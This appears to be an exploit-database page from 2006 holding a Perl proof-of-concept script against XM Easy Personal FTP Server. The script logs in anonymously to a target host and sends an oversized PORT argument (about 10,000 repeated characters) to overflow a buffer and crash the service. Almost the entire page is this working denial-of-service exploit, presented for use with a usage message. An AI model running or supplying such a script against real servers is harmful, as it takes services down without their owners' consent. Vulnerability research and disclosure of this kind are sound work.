[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : XM Easy Personal FTP Server 1.0 (Port) Remote Overflow PoC
# Published : 2006-03-04
# Author : luka.research
# Previous Title : Multiple Routers (IRC Request) Disconnect Denial of Service Vulnerability
# Next Title : FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit


#!/usr/bin/perl

# ---------------------------------------------------- #
# Name        : XM Easy Personal FTP Server            #
# Version     : 4.2                                    #
# ---------------------------------------------------- #
#	Type        : dos / remote 	               #
# Descritpion : buffer overflow for huge PORT value    #
# ---------------------------------------------------- #
# luka.research - id:28022006001                       #
# ---------------------------------------------------- #

use Net::FTP;

$host = @ARGV[0];

if ($host)
{
	$ftp = Net::FTP->new($host, Debug => 0);
	$ftp->login("anonymous",'me@here.there');
	$ftp->port("x41"x9999);
}         
else {
	print "n- XM Easy Personal FTP Server 4.2 - PoC Exploitn- Using: $0 hostn"; 
}  

# www.Syue.com [2006-03-04]